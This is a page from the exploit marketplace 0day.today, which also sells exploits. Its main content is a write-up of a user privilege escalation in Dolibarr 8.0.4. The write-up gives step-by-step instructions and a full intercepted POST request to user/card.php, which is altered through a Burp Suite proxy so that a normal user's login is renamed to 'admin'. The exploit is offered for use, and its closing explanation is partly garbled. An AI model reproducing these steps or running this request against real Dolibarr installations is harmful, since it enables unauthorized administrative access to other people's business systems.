0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dolibarr 8.0.4 - user privilege escalation Vulnerability
[################################################################################################# # Exploit title : Dolibarr 8.0.4 - user privilege escalation # Google Dork : N/A # Date : 06.02.2019 # Exploit Author : Mikayıl İlyas / Cyber-warrior.org - Bug Researchers group # Vendor Homepage : https://dolibarr.org # Software download : https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/ # Version : 8.0.4 # Tested on : Windows 7 # CVE : # Vulnerability Type : user privilege escalation ################################################################################################# # Step by Step to vulnerable Hello friends. This security vulnerability is available in version 8.0.4 of the Dolibarr software. It is very simple to use. First, let's set up our Dolibarr script for testing. After making all adjustments, create a new user from the Dolibarr management panel. Screenshots: https://i.hizliresim.com/bVVr00.png # Then let's give the "Create / modify your own user information" and "Change own password" permissions to the Normal user we created. Screenshot: https://i.hizliresim.com/Wqq0vE.png # Let's login to the system with the new user. Screenshot: https://i.hizliresim.com/YQQD7a.png # Yes, we did this. Now click on the user panel. Screenshot: https://i.hizliresim.com/166LRD.png # After entering the user panel, click "Change" button. Screenshot: https://i.hizliresim.com/XMM056.png # Now let's run the Burp suite software and set the proxy. Screenshot 1: https://i.hizliresim.com/DYYPN6.png Screenshot 2: https://i.hizliresim.com/Emmga8.png # Yes friends. After that, let's make a change in our user panel and save it. Screenshot: https://i.hizliresim.com/JZZaRQ.png localhost request: POST /dolibarr/user/card.php?id=4 HTTP/1.1 Host: localhost:85 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost:85/dolibarr/user/card.php?id=4&action=edit Content-Type: multipart/form-data; boundary=---------------------------257512254329775 Content-Length: 3798 Connection: close Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=65etle371s4vhk8tu3d7vk2qr0 Upgrade-Insecure-Requests: 1 -----------------------------257512254329775 Content-Disposition: form-data; name="token" $2y$10$xmymxx24s8wDTbPm8oIY8uleEK7DFsPwekUdPhanpSDg/UvC.nbKS -----------------------------257512254329775 Content-Disposition: form-data; name="action" update -----------------------------257512254329775 Content-Disposition: form-data; name="entity" 1 -----------------------------257512254329775 Content-Disposition: form-data; name="lastname" test user -----------------------------257512254329775 Content-Disposition: form-data; name="firstname" user test -----------------------------257512254329775 Content-Disposition: form-data; name="login" test_user -----------------------------257512254329775 Content-Disposition: form-data; name="password" -----------------------------257512254329775 Content-Disposition: form-data; name="admin" 0 -----------------------------257512254329775 Content-Disposition: form-data; name="superadmin" 0 -----------------------------257512254329775 Content-Disposition: form-data; name="gender" -1 -----------------------------257512254329775 Content-Disposition: form-data; name="employee" 1 -----------------------------257512254329775 Content-Disposition: form-data; name="fk_user" -1 -----------------------------257512254329775 Content-Disposition: form-data; name="address" CW -----------------------------257512254329775 Content-Disposition: form-data; name="zipcode" -----------------------------257512254329775 Content-Disposition: form-data; name="town" -----------------------------257512254329775 Content-Disposition: form-data; name="country_id" 0 -----------------------------257512254329775 Content-Disposition: form-data; name="state_id" 0 -----------------------------257512254329775 Content-Disposition: form-data; name="office_phone" -----------------------------257512254329775 Content-Disposition: form-data; name="user_mobile" -----------------------------257512254329775 Content-Disposition: form-data; name="office_fax" -----------------------------257512254329775 Content-Disposition: form-data; name="email" -----------------------------257512254329775 Content-Disposition: form-data; name="accountancy_code" -----------------------------257512254329775 Content-Disposition: form-data; name="color" -----------------------------257512254329775 Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream -----------------------------257512254329775 Content-Disposition: form-data; name="signature" -----------------------------257512254329775 Content-Disposition: form-data; name="job" -----------------------------257512254329775 Content-Disposition: form-data; name="weeklyhours" -----------------------------257512254329775 Content-Disposition: form-data; name="dateemployment" -----------------------------257512254329775 Content-Disposition: form-data; name="dateemploymentday" -----------------------------257512254329775 Content-Disposition: form-data; name="dateemploymentmonth" -----------------------------257512254329775 Content-Disposition: form-data; name="dateemploymentyear" -----------------------------257512254329775 Content-Disposition: form-data; name="birth" -----------------------------257512254329775 Content-Disposition: form-data; name="birthday" -----------------------------257512254329775 Content-Disposition: form-data; name="birthmonth" -----------------------------257512254329775 Content-Disposition: form-data; name="birthyear" -----------------------------257512254329775 Content-Disposition: form-data; name="save" Kaydet -----------------------------257512254329775-- # Now we do "normal_user" / change the username to "admin". Screenshot 1: https://i.hizliresim.com/lqqWzQ.png Screenshot 2: https://i.hizliresim.com/bVVGQm.png # After you do this, you will see a notification in the User panel that says "Your user name has been changed." And by checkout. "admin" password in the user name "normal user name you enter the password". Screenshot 1: https://i.hizliresim.com/nQQWkB.png That's it. more detailed : See you... # 0day.today [2024-12-26] #